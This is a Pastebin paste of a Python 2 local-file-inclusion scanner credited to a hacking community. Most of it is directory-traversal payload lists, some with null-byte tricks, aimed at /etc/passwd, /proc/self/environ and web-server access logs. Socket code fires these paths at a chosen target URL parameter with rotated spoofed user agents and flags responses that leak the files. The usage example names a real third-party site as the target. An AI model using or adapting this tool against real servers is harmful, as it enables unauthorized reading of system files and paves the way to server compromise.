API tools faq
paste
Advertisement
parkdream1

scan ver 1.1.py

parkdream1
Apr 25th, 2012
688
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 16.90 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # Author: parkdream1
  3. # Messenger: h3x4r
  4. # (c) R00TW0RM - Private Community
  5. # https://r00tw0rm.com/
  6. # Local File Include Scaner Ver. 1.1
  7. # Greets: To all members of r00tw0rm !!
  8.  
  9. import socket,sys,re,random,time,httplib
  10. from random import choice
  11.  
  12. passwd = ["/etc/passwd",
  13.     "../etc/passwd",
  14.     "../../etc/passwd",
  15.     "../../../etc/passwd",
  16.     "../../../../etc/passwd",
  17.     "../../../../../etc/passwd",
  18.     "../../../../../../etc/passwd",
  19.     "../../../../../../../etc/passwd",
  20.     "../../../../../../../../etc/passwd",
  21.     "../../../../../../../../../etc/passwd",
  22.     "../../../../../../../../../../etc/passwd",
  23.     "../../../../../../../../../../../etc/passwd",
  24.     "../../../../../../../../../../../../etc/passwd",
  25.     "../../../../../../../../../../../../../etc/passwd",
  26.     "/etc/passwd%00",
  27.     "../etc/passwd%00",
  28.     "../../etc/passwd%00",
  29.     "../../../etc/passwd%00",
  30.     "../../../../etc/passwd%00",
  31.     "../../../../../etc/passwd%00",
  32.     "../../../../../../etc/passwd%00",
  33.     "../../../../../../../etc/passwd%00",
  34.     "../../../../../../../../etc/passwd%00",
  35.     "../../../../../../../../../etc/passwd%00",
  36.     "../../../../../../../../../../etc/passwd%00",
  37.     "../../../../../../../../../../../etc/passwd%00",
  38.     "../../../../../../../../../../../../etc/passwd%00",
  39.     "../../../../../../../../../../../../../etc/passwd%00"]
  40.  
  41. environ = ["/proc/self/environ",
  42.     "../proc/self/environ",
  43.     "../../proc/self/environ",
  44.     "../../../proc/self/environ",
  45.     "../../../../proc/self/environ",
  46.     "../../../../../proc/self/environ",
  47.     "../../../../../../proc/self/environ",
  48.     "../../../../../../../proc/self/environ",
  49.     "../../../../../../../../proc/self/environ",
  50.     "../../../../../../../../../proc/self/environ",
  51.     "../../../../../../../../../../proc/self/environ",
  52.     "../../../../../../../../../../../proc/self/environ",
  53.     "../../../../../../../../../../../../proc/self/environ",
  54.     "../../../../../../../../../../../../../proc/self/environ",
  55.     "../../../../../../../../../../../../../../proc/self/environ",
  56.     "/proc/self/environ%00",
  57.     "../proc/self/environ%00",
  58.     "../../proc/self/environ%00",
  59.     "../../../proc/self/environ%00",
  60.     "../../../../proc/self/environ%00",
  61.     "../../../../../proc/self/environ%00",
  62.     "../../../../../../proc/self/environ%00",
  63.     "../../../../../../../proc/self/environ%00",
  64.     "../../../../../../../../proc/self/environ%00",
  65.     "../../../../../../../../../proc/self/environ%00",
  66.     "../../../../../../../../../../proc/self/environ%00",
  67.     "../../../../../../../../../../../proc/self/environ%00",
  68.     "../../../../../../../../../../../../proc/self/environ%00",
  69.     "../../../../../../../../../../../../../proc/self/environ%00",
  70.     "../../../../../../../../../../../../../../proc/self/environ%00"]
  71.  
  72. logs = ["/usr/local/apache2/logs/access_log",
  73.     "../usr/local/apache2/logs/access_log",
  74.     "../../usr/local/apache2/logs/access_log",
  75.     "../../../usr/local/apache2/logs/access_log",
  76.     "../../../../usr/local/apache2/logs/access_log",
  77.     "../../../../../usr/local/apache2/logs/access_log",
  78.     "../../../../../../usr/local/apache2/logs/access_log",
  79.     "../../../../../../../usr/local/apache2/logs/access_log",
  80.     "../../../../../../../../usr/local/apache2/logs/access_log",
  81.     "../../../../../../../../../usr/local/apache2/logs/access_log",
  82.     "../../../../../../../../../../usr/local/apache2/logs/access_log",
  83.     "../../../../../../../../../../../usr/local/apache2/logs/access_log",
  84.     "../../../../../../../../../../../../usr/local/apache2/logs/access_log",
  85.     "../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
  86.     "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
  87.     "/usr/local/apache2/logs/access_log%00",
  88.     "../usr/local/apache2/logs/access_log%00",
  89.     "../../usr/local/apache2/logs/access_log%00",
  90.     "../../../usr/local/apache2/logs/access_log%00",
  91.     "../../../../usr/local/apache2/logs/access_log%00",
  92.     "../../../../../usr/local/apache2/logs/access_log%00",
  93.     "../../../../../../usr/local/apache2/logs/access_log%00",
  94.     "../../../../../../../usr/local/apache2/logs/access_log%00",
  95.     "../../../../../../../../usr/local/apache2/logs/access_log%00",
  96.     "../../../../../../../../../usr/local/apache2/logs/access_log%00",
  97.     "../../../../../../../../../../usr/local/apache2/logs/access_log%00",
  98.     "../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
  99.     "../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
  100.     "../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
  101.     "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
  102.     "/var/log/apache2/access.log",
  103.     "../var/log/apache2/access.log",
  104.     "../../var/log/apache2/access.log",
  105.     "../../../var/log/apache2/access.log",
  106.     "../../../../var/log/apache2/access.log",
  107.     "../../../../../var/log/apache2/access.log",
  108.     "../../../../../../var/log/apache2/access.log",
  109.     "../../../../../../../var/log/apache2/access.log",
  110.     "../../../../../../../../var/log/apache2/access.log",
  111.     "../../../../../../../../../var/log/apache2/access.log",
  112.     "../../../../../../../../../../var/log/apache2/access.log",
  113.     "../../../../../../../../../../../var/log/apache2/access.log",
  114.     "../../../../../../../../../../../../var/log/apache2/access.log",
  115.     "../../../../../../../../../../../../../var/log/apache2/access.log",
  116.     "../../../../../../../../../../../../../../var/log/apache2/access.log",
  117.     "/var/log/apache2/access.log%00",
  118.     "../var/log/apache2/access.log%00",
  119.     "../../var/log/apache2/access.log%00",
  120.     "../../../var/log/apache2/access.log%00",
  121.     "../../../../var/log/apache2/access.log%00",
  122.     "../../../../../var/log/apache2/access.log%00",
  123.     "../../../../../../var/log/apache2/access.log%00",
  124.     "../../../../../../../var/log/apache2/access.log%00",
  125.     "../../../../../../../../var/log/apache2/access.log%00",
  126.     "../../../../../../../../../var/log/apache2/access.log%00",
  127.     "../../../../../../../../../../var/log/apache2/access.log%00",
  128.     "../../../../../../../../../../../var/log/apache2/access.log%00",
  129.     "../../../../../../../../../../../../var/log/apache2/access.log%00",
  130.     "../../../../../../../../../../../../../var/log/apache2/access.log%00",
  131.     "../../../../../../../../../../../../../../var/log/apache2/access.log%00",
  132.     "/var/log/httpd/access_log",
  133.     "../var/log/httpd/access_log",
  134.     "../../var/log/httpd/access_log",
  135.     "../../../var/log/httpd/access_log",
  136.     "../../../../var/log/httpd/access_log",
  137.     "../../../../../var/log/httpd/access_log",
  138.     "../../../../../../var/log/httpd/access_log",
  139.     "../../../../../../../var/log/httpd/access_log",
  140.     "../../../../../../../../var/log/httpd/access_log",
  141.     "../../../../../../../../../var/log/httpd/access_log",
  142.     "../../../../../../../../../../var/log/httpd/access_log",
  143.     "../../../../../../../../../../../var/log/httpd/access_log",
  144.     "../../../../../../../../../../../../var/log/httpd/access_log",
  145.     "../../../../../../../../../../../../../var/log/httpd/access_log",
  146.     "../../../../../../../../../../../../../../var/log/httpd/access_log",
  147.     "/var/log/httpd/access_log%00",
  148.     "../var/log/httpd/access_log%00",
  149.     "../../var/log/httpd/access_log%00",
  150.     "../../../var/log/httpd/access_log%00",
  151.     "../../../../var/log/httpd/access_log%00",
  152.     "../../../../../var/log/httpd/access_log%00",
  153.     "../../../../../../var/log/httpd/access_log%00",
  154.     "../../../../../../../var/log/httpd/access_log%00",
  155.     "../../../../../../../../var/log/httpd/access_log%00",
  156.     "../../../../../../../../../var/log/httpd/access_log%00",
  157.     "../../../../../../../../../../var/log/httpd/access_log%00",
  158.     "../../../../../../../../../../../var/log/httpd/access_log%00",
  159.     "../../../../../../../../../../../../var/log/httpd/access_log%00",
  160.     "../../../../../../../../../../../../../var/log/httpd/access_log%00",
  161.     "../../../../../../../../../../../../../../var/log/httpd/access_log%00",
  162.     "/var/log/httpd-access.log",
  163.     "../var/log/httpd-access.log",
  164.     "../../var/log/httpd-access.log",
  165.     "../../../var/log/httpd-access.log",
  166.     "../../../../var/log/httpd-access.log",
  167.     "../../../../../var/log/httpd-access.log",
  168.     "../../../../../../var/log/httpd-access.log",
  169.     "../../../../../../../var/log/httpd-access.log",
  170.     "../../../../../../../../var/log/httpd-access.log",
  171.     "../../../../../../../../../var/log/httpd-access.log",
  172.     "../../../../../../../../../../var/log/httpd-access.log",
  173.     "../../../../../../../../../../../var/log/httpd-access.log",
  174.     "../../../../../../../../../../../../var/log/httpd-access.log",
  175.     "../../../../../../../../../../../../../var/log/httpd-access.log",
  176.     "../../../../../../../../../../../../../../var/log/httpd-access.log",
  177.     "/var/log/httpd-access.log%00",
  178.     "../var/log/httpd-access.log%00",
  179.     "../../var/log/httpd-access.log%00",
  180.     "../../../var/log/httpd-access.log%00",
  181.     "../../../../var/log/httpd-access.log%00",
  182.     "../../../../../var/log/httpd-access.log%00",
  183.     "../../../../../../var/log/httpd-access.log%00",
  184.     "../../../../../../../var/log/httpd-access.log%00",
  185.     "../../../../../../../../var/log/httpd-access.log%00",
  186.     "../../../../../../../../../var/log/httpd-access.log%00",
  187.     "../../../../../../../../../../var/log/httpd-access.log%00",
  188.     "../../../../../../../../../../../var/log/httpd-access.log%00",
  189.     "../../../../../../../../../../../../var/log/httpd-access.log%00",
  190.     "../../../../../../../../../../../../../var/log/httpd-access.log%00",
  191.     "../../../../../../../../../../../../../../var/log/httpd-access.log%00",
  192.     "/var/www/logs/access_log",
  193.     "../var/www/logs/access_log",
  194.     "../../var/www/logs/access_log",
  195.     "../../../var/www/logs/access_log",
  196.     "../../../../var/www/logs/access_log",
  197.     "../../../../../var/www/logs/access_log",
  198.     "../../../../../../var/www/logs/access_log",
  199.     "../../../../../../../var/www/logs/access_log",
  200.     "../../../../../../../../var/www/logs/access_log",
  201.     "../../../../../../../../../var/www/logs/access_log",
  202.     "../../../../../../../../../../var/www/logs/access_log",
  203.     "../../../../../../../../../../../var/www/logs/access_log",
  204.     "../../../../../../../../../../../../var/www/logs/access_log",
  205.     "../../../../../../../../../../../../../var/www/logs/access_log",
  206.     "../../../../../../../../../../../../../../var/www/logs/access_log",
  207.     "/var/www/logs/access_log%00",
  208.     "../var/www/logs/access_log%00",
  209.     "../../var/www/logs/access_log%00",
  210.     "../../../var/www/logs/access_log%00",
  211.     "../../../../var/www/logs/access_log%00",
  212.     "../../../../../var/www/logs/access_log%00",
  213.     "../../../../../../var/www/logs/access_log%00",
  214.     "../../../../../../../var/www/logs/access_log%00",
  215.     "../../../../../../../../var/www/logs/access_log%00",
  216.     "../../../../../../../../../var/www/logs/access_log%00",
  217.     "../../../../../../../../../../var/www/logs/access_log%00",
  218.     "../../../../../../../../../../../var/www/logs/access_log%00",
  219.     "../../../../../../../../../../../../var/www/logs/access_log%00",
  220.     "../../../../../../../../../../../../../var/www/logs/access_log%00",
  221.     "../../../../../../../../../../../../../../var/www/logs/access_log%0",
  222.     "/var/apache2/logs/access_log",
  223.     "../var/apache2/logs/access_log",
  224.     "../../var/apache2/logs/access_log",
  225.     "../../../var/apache2/logs/access_log",
  226.     "../../../../var/apache2/logs/access_log",
  227.     "../../../../../var/apache2/logs/access_log",
  228.     "../../../../../../var/apache2/logs/access_log",
  229.     "../../../../../../../var/apache2/logs/access_log",
  230.     "../../../../../../../../var/apache2/logs/access_log",
  231.     "../../../../../../../../../var/apache2/logs/access_log",
  232.     "../../../../../../../../../../var/apache2/logs/access_log",
  233.     "../../../../../../../../../../../var/apache2/logs/access_log",
  234.     "../../../../../../../../../../../../var/apache2/logs/access_log",
  235.     "../../../../../../../../../../../../../var/apache2/logs/access_log",
  236.     "../../../../../../../../../../../../../../var/apache2/logs/access_log",
  237.     "/var/apache2/logs/access_log%00",
  238.     "../var/apache2/logs/access_log%00",
  239.     "../../var/apache2/logs/access_log%00",
  240.     "../../../var/apache2/logs/access_log%00",
  241.     "../../../../var/apache2/logs/access_log%00",
  242.     "../../../../../var/apache2/logs/access_log%00",
  243.     "../../../../../../var/apache2/logs/access_log%00",
  244.     "../../../../../../../var/apache2/logs/access_log%00",
  245.     "../../../../../../../../var/apache2/logs/access_log%00",
  246.     "../../../../../../../../../var/apache2/logs/access_log%00",
  247.     "../../../../../../../../../../var/apache2/logs/access_log%00",
  248.     "../../../../../../../../../../../var/apache2/logs/access_log%00",
  249.     "../../../../../../../../../../../../var/apache2/logs/access_log%00",
  250.     "../../../../../../../../../../../../../var/apache2/logs/access_log%00",
  251.     "../../../../../../../../../../../../../../var/apache2/logs/access_log%00"]
  252.        
  253. user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
  254.     'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
  255.     'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
  256.     'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0',
  257.     'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
  258.     'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0',
  259.     'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)',
  260.     'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
  261.     'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
  262.     'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11']
  263.  
  264. agent = random.choice(user)
  265.  
  266. def scanpasswd():
  267.     for lfi in passwd:
  268.         try:  
  269.             r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  270.             r.connect((target, port))
  271.             r.send("GET /"+path+lfi+" HTTP/1.0\r\n")
  272.             r.send("Host: "+target+"\r\n")
  273.             r.send("User-Agent: "+agent+"\r\n\r\n")
  274.             print "[*] Send Request Success"
  275.             print "http://"+target+"/"+path+lfi
  276.             page = r.recv(1024)
  277.             fullpage = ""
  278.             while len(page):
  279.                 fullpage = fullpage + page
  280.                 page = r.recv(1024)
  281.             r.close()
  282.         except Exception, e:
  283.             print "[-] Cant Not Send Request"
  284.             print e
  285.             sys.exit(1)
  286.         r00t = re.search("root:x:0:0:",fullpage)
  287.         if r00t:
  288.             print "\033[32m[*] Request Vulnerability\n"
  289.             sys.exit(1)
  290.         else:
  291.             print "[-] Request Is Not Vulnerability\n"
  292.         time.sleep(1)
  293.  
  294. def scanenviron():
  295.     for lfi1 in environ:
  296.         try:  
  297.             r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  298.             r.connect((target, port))
  299.             r.send("GET /"+path+lfi1+" HTTP/1.0\r\n")
  300.             r.send("Host: "+target+"\r\n")
  301.             r.send("User-Agent: "+agent+"\r\n\r\n")
  302.             print "[*] Send Request Success"
  303.             print "http://"+target+"/"+path+lfi1
  304.             page = r.recv(1024)
  305.             fullpage = ""
  306.             while len(page):
  307.                 fullpage = fullpage + page
  308.                 page = r.recv(1024)
  309.             r.close()
  310.         except Exception, e:
  311.             print "[-] Cant Not Send Request"
  312.             print e
  313.             sys.exit(1)
  314.         r00t = re.search("HTTP_HOST",fullpage)
  315.         if r00t:
  316.             print "\033[32m[*] Request Vulnerability\n"
  317.             sys.exit(1)
  318.         else:
  319.             print "[-] Request Is Not Vulnerability\n"
  320.         time.sleep(1)
  321.  
  322. def scanlogs():
  323.     conn = httplib.HTTPConnection(target)
  324.     conn.request("HEAD","/")
  325.     for lfi2 in logs:
  326.         try:  
  327.             r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  328.             r.connect((target, port))
  329.             r.send("GET /"+path+lfi2+" HTTP/1.0\r\n")
  330.             r.send("Host: "+target+"\r\n")
  331.             r.send("User-Agent: "+agent+"\r\n\r\n")
  332.             print "[*] Send Request Success"
  333.             print "http://"+target+"/"+path+lfi2
  334.             page = r.recv(1024)
  335.             fullpage = ""
  336.             while len(page):
  337.                 fullpage = fullpage + page
  338.                 page = r.recv(1024)
  339.             r.close()
  340.         except Exception, e:
  341.             print "[-] Cant Not Send Request"
  342.             print e
  343.             sys.exit(1)
  344.         r00t = re.search("HEAD / HTTP/1.1",fullpage)
  345.         if r00t:
  346.             print "\033[32m[*] Request Vulnerability\n"
  347.             sys.exit(1)
  348.         else:
  349.             print "[-] Request Is Not Vulnerability\n"
  350.         time.sleep(1)
  351.  
  352. def menu():
  353.     print "Menu:\n"
  354.     print "ID [1]"
  355.     print "[Scan /etc/passwd File]\n"
  356.     print "ID [2]"
  357.     print "[Scan Environ File]\n"
  358.     print "ID [3]"
  359.     print "[Scan Access Logs File]\n"
  360.     print "ID [4]"
  361.     print "[Exit]\n"
  362.     mess = raw_input("[*] Select ID For Start Scanner :")
  363.     if mess == "1":
  364.         print "Scan /etc/passwd File Starting ...\n"
  365.         scanpasswd()
  366.         sys.exit(1)
  367.     if mess == "2":
  368.         print "Scan /proc/self/environ File Starting ...\n"
  369.         scanenviron()
  370.         sys.exit(1)
  371.     if mess == "3":
  372.         print "Scan Access Logs File Starting ...\n"
  373.         scanlogs()
  374.         sys.exit(1)
  375.     if mess == "4":
  376.         print "Exiting..."
  377.         sys.exit(1)
  378.     else:
  379.         print "Unknow Command\n"
  380.         print "Please rechoice ID\n"
  381.         menu()
  382.  
  383. def banner():
  384.     print "\n"
  385.     print "****************************************************************************"
  386.     print "||                         Local File Include Scaner Ver. 1.1             ||"
  387.     print "||                                 by parkdream1                          ||"
  388.     print "||                        (c) R00TW0RM - Private Community                ||"
  389.     print "                    Fucking from "+target+" on port "+str(port)
  390.     print "****************************************************************************"
  391.     print "\n"
  392.  
  393. if __name__ == '__main__':
  394.     if len(sys.argv) != 4:
  395.         print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
  396.         print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 "+'"index.php?src="'
  397.         sys.exit(1)
  398.  
  399.     target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
  400.  
  401.     banner()
  402.     menu()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!